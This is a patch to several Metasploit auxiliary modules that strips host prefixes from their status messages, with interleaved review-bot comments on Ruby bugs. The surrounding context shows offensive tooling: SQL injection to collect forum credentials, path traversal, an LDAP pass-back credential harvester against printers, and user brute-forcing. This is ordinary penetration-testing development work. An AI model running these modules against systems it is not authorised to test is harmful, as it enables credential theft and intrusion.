+++ b/modules/auxiliary/gather/huawei_wifi_info.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def get_wifi_info - print_status("#{peer} - Getting WiFi Key details...") + print_status("Getting WiFi Key details...") res = send_request_raw( { 'method' => 'GET', @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary def get_router_info - print_status("#{peer} - Gathering basic device information...") + print_status("Gathering basic device information...") res = send_request_raw( { 'method' => 'GET', @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_ssid - print_status("#{peer} - Gathering device SSID...") + print_status("Gathering device SSID...") res = send_request_raw( { @@ -183,7 +183,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_mac_filter_info - print_status("#{peer} - Gathering MAC filters...") + print_status("Gathering MAC filters...") res = send_request_raw( { 'method' => 'GET', @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_wan_info - print_status("#{peer} - Gathering WAN information...") + print_status("Gathering WAN information...") res = send_request_raw( { 'method' => 'GET', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_dhcp_info - print_status("#{peer} - Gathering DHCP information...") + print_status("Gathering DHCP information...") res = send_request_raw( { 'method' => 'GET', 
@@ -274,19 +274,19 @@ class Metasploit3 < Msf::Auxiliary def is_target?(res) # check whether we got any response from server and proceed. unless res - print_error("#{peer} - Failed to get any response from server") + print_error("Failed to get any response from server") return false end # Is it a HTTP OK unless res.code == 200 - print_error("#{peer} - Did not get HTTP 200, URL was not found") + print_error("Did not get HTTP 200, URL was not found") return false end # Check to verify server reported is a Huawei router unless res.headers['Server'].match(/IPWEBS\/1.4.0/i) - print_error("#{peer} - Target doesn't seem to be a Huawei router") + print_error("Target doesn't seem to be a Huawei router") return false end diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index e2269fe1bb..20b3d6911b 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary @charset.push(Rex::Text.uri_encode(spec)) end end - print_status("#{peer} - Performing Bruteforce attack") - vprint_status("#{peer} - Using CHARSET: [#{@charset.join(",")}]") + print_status("Performing Bruteforce attack") + vprint_status("Using CHARSET: [#{@charset.join(",")}]") else - print_status("#{peer} - Performing dictionary based attack (#{datastore['DICT']})") + print_status("Performing dictionary based attack (#{datastore['DICT']})") end if datastore['DICT'].blank? and datastore['MAXDEPTH'] > 2 # warn user on long runs - print_status("#{peer} - Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") + print_status("Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") end # create initial test queue and populate 
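Review bot: `is_target?` in hunk `@@ -274,19` calls `res.headers['Server'].match(...)` without checking that the header is present. A 200 response with no `Server` header would presumably raise NoMethodError on nil instead of printing "Target doesn't seem to be a Huawei router". The pattern also leaves the dots unescaped, so `1.4.0` matches any character in those positions. `unless res.headers['Server'].to_s =~ /IPWEBS\/1\.4\.0/i` covers both. The method continues past the end of the hunk.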
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary @charset.each { |char| @test_queue.push(char) } else ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } - vprint_status("#{peer} - Loaded #{@test_queue.length} values from dictionary") + vprint_status("Loaded #{@test_queue.length} values from dictionary") end @depth_warning = true @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Testing for IBM Lotus Notes Sametime User Enumeration flaw") + print_status("Testing for IBM Lotus Notes Sametime User Enumeration flaw") # test for expected response code on non-existant uid/email if datastore['TYPE'] == "UID" @@ -126,17 +126,17 @@ class Metasploit3 < Msf::Auxiliary begin if res.nil? - print_error("#{peer} - Timeout") + print_error("Timeout") return elsif res.code != 200 - print_error("#{peer} - Unexpected response from server (Response code: #{res.code})") + print_error("Unexpected response from server (Response code: #{res.code})") return elsif JSON.parse(res.body) # valid JSON response - valid response for check - print_good("#{peer} - Response received, continuing to enumeration phase") + print_good("Response received, continuing to enumeration phase") end rescue JSON::ParserError, - print_error("#{peer} - Error parsing JSON: Invalid response from server") + print_error("Error parsing JSON: Invalid response from server") return end @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end def test_handler - print_status("#{peer} - Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") + print_status("Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") test_length = 1 # initial test length set until @test_queue.empty? 
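Review bot: The context line `rescue JSON::ParserError,` in hunk `@@ -126,17` ends with a comma, so Ruby reads the `print_error("Error parsing JSON: ...")` call on the next line as a second entry in the rescue list rather than as the handler body. The parse-error message is then not printed when a ParserError is caught. For any other exception the call is evaluated as a rescue matcher, which should fail because its return value is not a class or module (inferred from the syntax, not executed here). Dropping the comma gives the intended handler: `rescue JSON::ParserError`. The `begin` block sits inside `run`, which starts in the previous hunk.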
@@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary # provide feedback to user on current test length if datastore['DICT'].blank? and test_current.length > test_length test_length = test_current.length - print_status("#{peer} - Beginning bruteforce test for #{test_length} character strings") + print_status("Beginning bruteforce test for #{test_length} character strings") end res = make_request(test_current) @@ -178,11 +178,11 @@ class Metasploit3 < Msf::Auxiliary if res.nil? and not @retries.include?(test_current) # attempt test again as the server was too busy to respond # correctly - error returned - print_error("#{peer} - Error reading JSON response, attempting to redo check for \"#{test_current}\"") + print_error("Error reading JSON response, attempting to redo check for \"#{test_current}\"") @test_queue.push(test_current) @retries << test_current if @retries.length == 10 - print_error("#{peer} - Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") + print_error("Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") end elsif res # check response for user data @@ -242,11 +242,11 @@ class Metasploit3 < Msf::Auxiliary unless @user_data.flatten.include?(userinfo['uid']) @user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ] # print newly discovered users straight to the screen if verbose mode is set - vprint_good("#{peer} - New user found: #{userinfo['uid']}") + vprint_good("New user found: #{userinfo['uid']}") report_user(userinfo['uid']) end rescue JSON::ParserError - print_error("#{peer} - Error reading JSON string, continuing") + print_error("Error reading JSON string, continuing") end end 
@@ -263,7 +263,7 @@ class Metasploit3 < Msf::Auxiliary @test_queue.push(test_current + char) end elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1 - vprint_status("#{peer} - Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") + vprint_status("Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") @depth_warning = false end end @@ -301,10 +301,10 @@ class Metasploit3 < Msf::Auxiliary end if not user_tbl.to_s.empty? - print_good("#{peer} - #{@user_data.length} users extracted") + print_good("#{@user_data.length} users extracted") print_line(user_tbl.to_s) else - print_error("#{peer} - No users discovered") + print_error("No users discovered") end end diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index dd0520d430..07cf026d44 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Beginning IBM Lotus Notes Sametime Meeting Room Bruteforce") + print_status("Beginning IBM Lotus Notes Sametime Meeting Room Bruteforce") print_status("Using owner: #{datastore['OWNER']}") # test for expected response code on non-existant meeting room name @@ -71,14 +71,14 @@ class Metasploit3 < Msf::Auxiliary }) unless res - print_error("#{peer} - No response, timeout") + print_error("No response, timeout") return end if res.code == 404 and res.body =~ /Room does not exist/i - vprint_status("#{peer} - Server responding to restapi requests as expected") + vprint_status("Server responding to restapi requests as expected") else - print_error("#{peer} - Unexpected response from server (#{res.code}). Exiting...") + print_error("Unexpected response from server (#{res.code}). Exiting...") return end 
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } vprint_status("Loaded #{@test_queue.length} values from dictionary") - print_status("#{peer} - Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)") + print_status("Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)") while(not @test_queue.empty?) t = [] @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary Thread.current.kill if not test_current res = make_request(test_current) if res.nil? - print_error("#{peer} - Timeout from server when testing room \"#{test_current}\"") + print_error("Timeout from server when testing room \"#{test_current}\"") elsif res and res.code == 404 - vprint_status("#{peer} - Room \"#{test_current}\" was not valid for owner #{datastore['OWNER']}") + vprint_status("Room \"#{test_current}\" was not valid for owner #{datastore['OWNER']}") else # check response for user data check_response(res, test_current) diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index 59db20b9a3..d9ea98a4e6 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -192,10 +192,10 @@ class Metasploit3 < Msf::Auxiliary def report if @version_info['version']['sametimeVersion'] print_line - print_good("#{peer} - #{@version_info['version']['sametimeVersion']} Detected") + print_good("#{@version_info['version']['sametimeVersion']} Detected") else print_line - print_status("#{peer} - IBM Lotus Sametime information") + print_status("IBM Lotus Sametime information") end # configure tables @@ -298,7 +298,7 @@ class Metasploit3 < Msf::Auxiliary @version_info['conf'] = {} @version_info['api'] = {} - print_status("#{peer} - Checking IBM Lotus Sametime Server") + print_status("Checking IBM Lotus Sametime Server") URLS.each do | url | check_url(url) end 
@@ -312,13 +312,13 @@ class Metasploit3 < Msf::Auxiliary proxy = URI(@version_info['conf']['meetingroomcenter.stProxyAddress']).host end - print_good("#{peer} - Sametime Proxy address discovered #{proxy}") + print_good("Sametime Proxy address discovered #{proxy}") PROXY_URLS.each do | url | check_url(url, proxy) end elsif proxy? - print_status("#{peer} - Sametime Proxy address discovered, but checks disabled") + print_status("Sametime Proxy address discovered, but checks disabled") end report unless @version_info.empty? diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb index d6ddc26305..b16a028b08 100644 --- a/modules/auxiliary/gather/java_rmi_registry.rb +++ b/modules/auxiliary/gather/java_rmi_registry.rb 
@@ -34,53 +34,53 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end - print_status("#{peer} - Listing names in the Registry...") + print_status("Listing names in the Registry...") begin names = send_registry_list rescue ::Rex::Proto::Rmi::Exception => e - print_error("#{peer} - List raised exception #{e.message}") + print_error("List raised exception #{e.message}") return end if names.nil? - print_error("#{peer} - Failed to list names") + print_error("Failed to list names") return end if names.empty? - print_error("#{peer} - Names not found in the Registry") + print_error("Names not found in the Registry") return end - print_good("#{peer} - #{names.length} names found in the Registry") + print_good("#{names.length} names found in the Registry") names.each do |name| begin remote_reference = send_registry_lookup(name: name) rescue ::Rex::Proto::Rmi::Exception => e - print_error("#{peer} - Lookup of #{name} raised exception #{e.message}") + print_error("Lookup of #{name} raised exception #{e.message}") next end if remote_reference.nil? - print_error("#{peer} - Failed to lookup #{name}") + print_error("Failed to lookup #{name}") next end - print_good("#{peer} - Name #{name} (#{remote_reference[:object]}) found on #{remote_reference[:address]}:#{remote_reference[:port]}") + print_good("Name #{name} (#{remote_reference[:object]}) found on #{remote_reference[:address]}:#{remote_reference[:port]}") report_service( :host => remote_reference[:address], :port => remote_reference[:port], diff --git a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb index 4f43207091..27092ab4f4 100644 --- a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb 
+++ b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>' }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml0_body = ::Nokogiri::XML(response.body) @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionError - print_error("#{peer} - Version check Connection failed.") + print_error("Version check Connection failed.") end # This section logs on and retrieves AuthKey token @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => authreq_xml.to_xml }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml1_body = ::Nokogiri::XML(response.body) @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary extract(major, minor, authkey) end rescue ::Rex::ConnectionError - print_error("#{peer} - Login Connection failed.") + print_error("Login Connection failed.") end end @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => smbreq_xml.to_xml }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml2_body = ::Nokogiri::XML(response.body) diff --git a/modules/auxiliary/gather/memcached_extractor.rb b/modules/auxiliary/gather/memcached_extractor.rb index 2aa7fee13d..72df26dd36 100644 --- a/modules/auxiliary/gather/memcached_extractor.rb +++ b/modules/auxiliary/gather/memcached_extractor.rb 
@@ -111,11 +111,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Connecting to memcached server...") + vprint_status("Connecting to memcached server...") begin connect if (version = determine_version) - vprint_good("#{peer} - Connected to memcached version #{version}") + vprint_good("Connected to memcached version #{version}") unless localhost?(ip) report_service( host: ip, @@ -126,11 +126,11 @@ class Metasploit3 < Msf::Auxiliary ) end else - print_error("#{peer} - unable to determine memcached protocol version") + print_error("unable to determine memcached protocol version") return end keys = enumerate_keys - print_good("#{peer} - Found #{keys.size} keys") + print_good("Found #{keys.size} keys") return if keys.size == 0 data = data_for_keys(keys) @@ -144,10 +144,10 @@ class Metasploit3 < Msf::Auxiliary print_line("#{result_table}") unless localhost?(ip) path = store_loot('memcached.dump', 'text/plain', ip, data, 'memcached.txt', 'Memcached extractor') - print_good("#{peer} - memcached loot stored at #{path}") + print_good("memcached loot stored at #{path}") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout - vprint_error("#{peer} - Could not connect to memcached server!") + vprint_error("Could not connect to memcached server!") end end end diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f9e6328ab0..394b1facdf 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # Check forum MyBB if res.body.match("MYBB") - print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") + print_good("MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown 
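Review bot: `run_host` in memcached_extractor.rb still assigns `peer = "#{ip}:#{rport}"` on the first context line of the `@@ -111,11` hunk, yet every use of `peer` visible in this file's three hunks is removed, so the local now looks dead. It also shadows any `peer` helper the module inherits, which becomes confusing once the messages no longer name it. If nothing in the lines between the hunks reads it, delete the assignment. The same leftover assignment is visible in a10networks_ax_directory_traversal.rb (`@@ -61,7`) and clansphere_traversal.rb (`@@ -47,7`) later in this patch. Parts of `run_host` lie between the hunks, so confirm there is no remaining reader before removing it.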
@@ -77,13 +77,13 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Checking MyBB...") + print_status("Checking MyBB...") unless check == Exploit::CheckCode::Detected - print_error("#{peer} - MyBB not found") + print_error("MyBB not found") return end - print_status("#{peer} - Checking database...") + print_status("Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { @@ -94,17 +94,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("#{peer} - Timeout...") + print_error("Timeout...") return end # Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("#{peer} - Running PostgreSQL Database") + print_good("Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("#{peer} - Running SQLite Database") + print_good("Running SQLite Database") else - print_status("#{peer} - Running MySQL or unknown database") + print_status("Running MySQL or unknown database") end end end diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index dbc12f74fc..d7de619453 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end 
@@ -77,11 +77,11 @@ class Metasploit3 < Msf::Auxiliary def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -173,21 +173,21 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i - print_good("#{peer} - #{count_users} users found. Collecting credentials...") + print_good("#{count_users} users found. Collecting credentials...") users_table = Rex::Ui::Text::Table.new( 'Header' => 'vBulletin Users', diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index b06dd773c8..f3aed3ef04 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting website export...") + print_status("Requesting website export...") res = send_request_cgi( { 'method' => 'POST', 
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary print_status("it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.") else store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup') - print_good("#{peer} - Backup archive saved to #{store_path}") + print_good("Backup archive saved to #{store_path}") end end end diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index ebdc2ed1a7..d302309b70 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def process_row(row) if row[:user_login] && row[:user_pass] - print_good("#{peer} - Found credential: #{row[:user_login]}:#{row[:user_pass]}") + print_good("Found credential: #{row[:user_login]}:#{row[:user_pass]}") credential_data = { origin_type: :service, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting CSV extract...") + print_status("Requesting CSV extract...") res = send_request_cgi( 'method' => 'POST', 'uri' => exporter_url, @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing response...") + print_status("Parsing response...") unless parse_csv(res.body, ',') unless parse_csv(res.body, ';') fail_with(Failure::UnexpectedReply, "#{peer} - Failed to parse response, the CSV was invalid") 
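Review bot: The `fail_with` call on the last context line of the `@@ -97,7` hunk still builds its message as `"#{peer} - Failed to parse response, the CSV was invalid"`, while the `print_status` calls next to it lose the prefix. If this series moves host attribution into the output helpers (that change is not visible in this part of the patch), this message will either carry the peer twice or be the only one formatted by hand. Either change it to `fail_with(Failure::UnexpectedReply, 'Failed to parse response, the CSV was invalid')` or add a comment such as `# fail_with is not prefixed automatically, keep peer here` so the exception reads as deliberate. `run` continues in the next hunk.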
@@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary end store_path = store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract') - print_good("#{peer} - CSV saved to #{store_path}") + print_good("CSV saved to #{store_path}") end end diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index 86fb68d333..bc8354c347 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to extract LDAP username and password...") + print_status("Attempting to extract LDAP username and password...") @auth_cookie = default_page if @auth_cookie.blank? - print_status("#{peer} - Unable to get authentication cookie from #{rhost}") + print_status("Unable to get authentication cookie from #{rhost}") return end @@ -56,10 +56,10 @@ class Metasploit3 < Msf::Auxiliary start_listener unless @data - print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(") + print_error("Failed to start listiner or the printer did not send us the creds. :(") status = restore_ldap_server unless status - print_error("#{peer} - Failed to restore old LDAP server. Please manually restore") + print_error("Failed to restore old LDAP server. Please manually restore") end return end 
@@ -71,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}" # Woot we got creds so lets save them.# - print_good("#{peer} - The following creds were capured: #{ldap_creds}") + print_good("The following creds were capured: #{ldap_creds}") loot_name = 'ldap.cp.creds' loot_type = 'text/plain' loot_filename = 'ldap-creds.text' loot_desc = 'LDAP Pass-back Harvester' p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc) - print_status("#{peer} - Credentials saved in: #{p}") + print_status("Credentials saved in: #{p}") register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1]) end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary method = 'GET' res = make_request(page, method, '') if res.blank? || res.code != 200 - print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.") + print_error("Failed to connect to #{rhost}. Please check the printers IP address.") return '' end res.get_cookies @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary res = make_request(login_page, method, login_post_data) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to login. Please check the password for the Administrator account") + print_error("Failed to login. Please check the password for the Administrator account") return nil end res.code @@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten @ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}" @ldap_port = ldap_port_number[0] - print_status("#{peer} - LDAP server: #{@ldap_server}") + print_status("LDAP server: #{@ldap_server}") unless res.code == 200 || res.blank? - print_error("#{peer} - Failed to get LDAP data.") + print_error("Failed to get LDAP data.") return nil end res.code 
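Review bot: In the `@@ -126,9` hunk the guard `unless res.code == 200 || res.blank?` reads `res.code` before it tests `res.blank?`, and a blank response skips the error branch and reaches the trailing `res.code`. `make_request` (hunk `@@ -265,7`) returns `res` after rescuing connection errors, so `res` can apparently be nil here and the method would raise NoMethodError instead of printing "Failed to get LDAP data.". Use the same form as the sibling checks in this file, `if res.blank? || res.code != 200`, and move it above the `print_status("LDAP server: ...")` line so the address is only reported for a usable response. The `@@ -184,7` hunk has the same unguarded `res.code` straight after `make_request`. The start of this method is outside the hunk, so the earlier reads of the response body should be checked the same way.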
@@ -149,10 +149,10 @@ class Metasploit3 < Msf::Auxiliary ldap_update_post *= '&' method = 'POST' - print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") + print_status("Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") res = make_request(ldap_update_page, method, ldap_update_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}") + print_error("Failed to update LDAP server. Please check the host: #{rhost}") return nil end res.code @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary ldap_trigger_post *= '&' method = 'POST' - print_status("#{peer} - Triggering LDAP reqeust") + print_status("Triggering LDAP reqeust") res = make_request(ldap_trigger_page, method, ldap_trigger_post) res.code end @@ -243,10 +243,10 @@ class Metasploit3 < Msf::Auxiliary ldap_restore_post *= '&' method = 'POST' - print_status("#{peer} - Restoring LDAP server: #{@ldap_server}") + print_status("Restoring LDAP server: #{@ldap_server}") res = make_request(ldap_restore_page, method, ldap_restore_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually") + print_error("Failed to restore LDAP server: #{@ldap_server}. Please fix manually") return nil end res.code @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Auxiliary }, datastore['TIMEOUT'].to_i) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - print_error("#{peer} - Connection failed.") + print_error("Connection failed.") end res diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index 9e36f7fd21..d7242a5e71 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb 
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary temp = JSON.parse(res.body) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Auxiliary 'CouchDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 1dca83d949..0fc0fd14c0 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -32,14 +32,14 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indices...") + vprint_status("Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable - vprint_error("#{peer} - Unable to establish connection") + vprint_error("Unable to establish connection") return end @@ -47,11 +47,11 @@ class Metasploit3 < Msf::Auxiliary begin json_body = JSON.parse(res.body) rescue JSON::ParserError - vprint_error("#{peer} - Unable to parse JSON") + vprint_error("Unable to parse JSON") return end else - vprint_error("#{peer} - Timeout or unexpected response...") + vprint_error("Timeout or unexpected response...") return end @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary end if indices.length > 0 - print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") + print_good("ElasticSearch Indices found: #{indices.join(", ")}") end end 
diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 6f80a86707..82e6fbb881 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 and res.body =~ /Error report/ - vprint_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + vprint_error("Cannot obtain '#{fname}', here are some possible reasons:") vprint_error("\t1. File does not exist.") vprint_error("\t2. The server does not have any patches deployed.") vprint_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -88,11 +88,11 @@ class Metasploit3 < Msf::Auxiliary fname ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/ - vprint_error("#{peer} - File not found. Check FILE.") + vprint_error("File not found. Check FILE.") else - vprint_error("#{peer} - Fail to obtain file for some unknown reason") + vprint_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb 